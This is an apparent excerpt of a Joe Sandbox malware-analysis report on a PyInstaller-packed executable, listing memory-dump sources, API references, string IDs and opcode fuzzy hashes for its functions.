                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                                                                                                        • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                        • Instruction ID: 75ae331f81973749785d7110250b2a3d77656eeac37c8763a39ec9aa3e57d55d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76110B21B0D642C2FA5477A1669193DE1427F54BA0FB54734E92E46BDAFE2CEC09C323
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                        • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                        • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                        • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction ID: 668c0d01dedc40ac439819db53dc15fc49a226969ffbb4f99fb4b8c00e0ed1ff
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7531B763B1C68192E710B7A1A8409F6A2A4BF887D4FA04131EE8D83759FF7CD94AC611
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                        • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction ID: 210043caaac010a93c0631d00653b778f0504af554adb9aa90d00b3b86b5eb6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06317F7261DA8189EB20EB61F8546FAA3A0FF89784FA00135EA4D47B49EF3CC509C711
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF78DA5918F,?,00007FF78DA53C55), ref: 00007FF78DA52BA0
• MessageBoxW.USER32 ref: 00007FF78DA52C2A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentMessageProcess
• String ID: WARNING$Warning$[PYI-%d:%ls]
• API String ID: 1672936522-3797743490
APIs
• GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF78DA51B99), ref: 00007FF78DA52760
Strings
Similarity
• API ID: CurrentProcess
• String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
• API String ID: 2050909247-1591803126
APIs
Strings
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
APIs
• FlsGetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B41F
• FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B43E
• FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B466
• FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B477
• FlsSetValue.KERNEL32(?,?,?,00007FF78DA6A613,?,?,00000000,00007FF78DA6A8AE,?,?,?,?,?,00007FF78DA6A83A), ref: 00007FF78DA6B488
Similarity
• API ID: Value
• String ID:
• API String ID: 3702945584-0
APIs
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3702945584-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
APIs
• CreateDirectoryW.KERNEL32(00000000,?,00007FF78DA5352C,?,00000000,00007FF78DA53F23), ref: 00007FF78DA57F22
Strings
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                                                                                                        • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                        • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                        • Opcode ID: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                        • Instruction ID: 415e8dd1376490eaa2bf89541c392b936f9685d8d46cd9595350dcc6c6619958
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1106a047486010b66b16d7d561c3e0e79f8eec2dc114c611d5a943da294bb6a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C331EB2161DAC145EA21A710E410BBAA364FB44BD4FB00230EE6D877C9FE2CD909C711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                        • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction ID: ee63d275ee30840ba70978b0387a4ed20197289781e89d4d8cee318743aaeffa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B21916270CB4182E710AB54B444BEAA3A4FB88784FA04135EA8D9765AEF3CDA49C751
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                        • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction ID: c2108a0d336869aac9ce2a27365cbd8d62e6254611d2b38c20fb4f9fd00c719e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DD12872B1CA40C9E710EFA5E8405AC7B71FB54798BB08235DE5D97B89EE38D80AC351
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                        • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction ID: 999691bae8b49fecbca7c1a0b76e9d0ce3c83a392617e9512f0710236e221ae3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51E872F0C111CAFB14EF64A951ABCA765BB54398FB00135DE1D526E5EF38E809C711
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                        • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction ID: 676869768b9c2ed2e92e6f669298153e27006476215f17bd70dfff3e8bfb5d1c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8515D22E0C6418AFB10EFB1E4507BDA3B1BB48B58FB44435DE4957689EF39D849C722
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction ID: 03e0550839d606f21aba8e6bc4f3cb1ad0373f3e01ede3794949e2d389140e3e
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: 8B11E931B5C14242F654A7A9F548ABA9261FF84780FF44130DB4947BC9ED2DDC89C211
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction ID: cf5f229285d5f1b5bad3368ca1dff7463308b852b6448e956f6c752483df55a7
• Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
• Instruction Fuzzy Hash: A9411B12A0C78245FB24AB25A441B7AD690FB90BA4FB44235EF9C06AD5FF3DDC45C711
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF78DA690B6
  • Part of subcall function 00007FF78DA6A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9CE
  • Part of subcall function 00007FF78DA6A9B8: GetLastError.KERNEL32(?,?,?,00007FF78DA72D92,?,?,?,00007FF78DA72DCF,?,?,00000000,00007FF78DA73295,?,?,?,00007FF78DA731C7), ref: 00007FF78DA6A9D8
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF78DA5CC15), ref: 00007FF78DA690D4
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\9g9LZNE4bH.exe
• API String ID: 3580290477-3807041592
• Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction ID: 1dcd97196c177f86636857d5f62d8ded1935fd15860b051534bb418523fe64f7
• Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
• Instruction Fuzzy Hash: 76417036A0C602C5E754BF65A8408B9A395FB48B94BF54035E94D53B85EF3CD889C362
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction ID: 0efbc6a871346ba18dc5002c99e2e9583dcc33c369cb90dbca7ce8b0c98a816b
• Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
• Instruction Fuzzy Hash: AE41B323B1CA81C1DB20AF65E8447A9AB60FB88794FA04031EE4D87B98FF3CD805C751
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
